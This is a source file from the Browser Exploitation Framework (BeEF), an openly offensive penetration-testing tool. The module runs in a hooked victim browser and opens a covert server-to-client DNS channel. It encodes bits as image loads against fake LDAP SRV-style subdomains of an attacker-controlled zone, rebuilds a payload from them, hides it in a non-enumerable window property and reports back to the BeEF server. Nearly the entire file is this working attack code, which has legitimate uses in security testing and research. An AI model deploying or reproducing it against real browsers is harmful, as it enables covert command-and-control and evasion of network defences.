Path: blob/master/modules/ipec/s2c_dns_tunnel/command.js
1873 views
//1// Copyright (c) 2006-2026Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56/*7This JavaScript retrieves data from a server via DNS covert channel.89A remote controlled domain with a custom DNS server implementing covert channel logic is required.10BeEF supports this feature via Server-to-Client DNS Tunnel extension.1112The initial concept of the DNS covert channel and its implementation are described in the following literature:13- K.Born. Browser-Based Covert Data Exfiltration. http://arxiv.org/ftp/arxiv/papers/1004/1004.4357.pdf14- W. Alcorn,C. Frichot, M.Orru. The Browser Hacker's Handbook. ISBN-13: 978-1118662090, ISBN-10: 11186620911516*/17beef.execute(function() {1819var payload_name = "<%= @payload_name %>";20var domain = "<%= @zone %>";21var scheme = beef.net.httpproto;22var port = beef.net.port;23var cid = "<%= @command_id %>";24var curl = "<%= @command_url %>";2526var messages = new Array();27var bits = new Array();28var bit_transfered = new Array();29var timing = new Array();3031// Do the DNS query by requesting an image32send_query = function(fqdn, msg, byte, bit) {33var img = new Image;34var fport = "";3536if (port !== "80") fport = ":"+port;3738img.src = scheme+"://" + fqdn + fport + "/tiles/map";3940img.onload = function() { // successful load so bit equals 141bits[msg][bit] = 1;42bit_transfered[msg][byte]++;43if (bit_transfered[msg][byte] >= 8) reconstruct_byte(msg, byte);44}4546img.onerror = function() { // unsuccessful load so bit equals 047bits[msg][bit] = 0;48bit_transfered[msg][byte]++;49if (bit_transfered[msg][byte] >= 8) reconstruct_byte(msg, byte);50}51};5253// Construct DNS names based on Active Directory SRV resource records pattern and resolve them via send_query function54// See http://technet.microsoft.com/en-us/library/cc961719.aspx55function get_byte(msg, byte) {56bit_transfered[msg][byte] = 0;57var rnd8 = getRandomStr(8);58var rnd12 = getRandomStr(12);59// Request the byte one bit at a time60for(var bit=byte*8; bit < (byte*8)+8; bit++){61// Set the message number (hex)62msg_str = ("" + msg.toString(16)).substr(-8);63// Set the bit number (hex)64bit_str = ("" + bit.toString(16)).substr(-8);65// Build the subdomain66subdomain = "_ldap._tcp." + rnd8 + "-" + msg_str + "-" + cid + "-" + bit_str + "-" + rnd12;67// Build the full domain68name = subdomain + '.domains._msdcs.'+ domain;69send_query(name, msg, byte, bit)70}71}7273// Construct random string74function getRandomStr(n){75return Math.random().toString(36).slice(2, 2 + Math.max(1, Math.min(n, 12)));76}7778// Build the environment and request the message79function get_message(msg) {80// Set variables for getting a message81messages[msg] = "";82bits[msg] = new Array();83bit_transfered[msg] = new Array();84timing[msg] = (new Date()).getTime();85get_byte(msg, 0);86}8788// Build the data returned from the binary results89function reconstruct_byte(msg, byte){90var char = 0;91// Build the last byte requested92for(var bit=byte*8; bit < (byte*8)+8; bit++){93char <<= 1;94char += bits[msg][bit] ;95}9697// Message is terminated with a null byte (all failed DNS requests)98if (char != 0) {99// The message isn't terminated so get the next byte100messages[msg] += String.fromCharCode(char);101get_byte(msg, byte+1);102}103else {104// The message is terminated so finish105delta = ((new Date()).getTime() - timing[msg])/1000;106bytes_per_second = "" +107((messages[msg].length + 1) * 8)/delta;108109// Save the message in the Window110if (window.hasOwnProperty(payload_name))111window[payload_name] = messages[msg]112else113Object.defineProperty(window,payload_name, { value: messages[msg],114writable: true,115enumerable: false });116117beef.net.send(curl, parseInt(cid),'s2c_dns_tunnel=true' + '&bps=' + bytes_per_second);118119}120}121get_message(0);122});123124125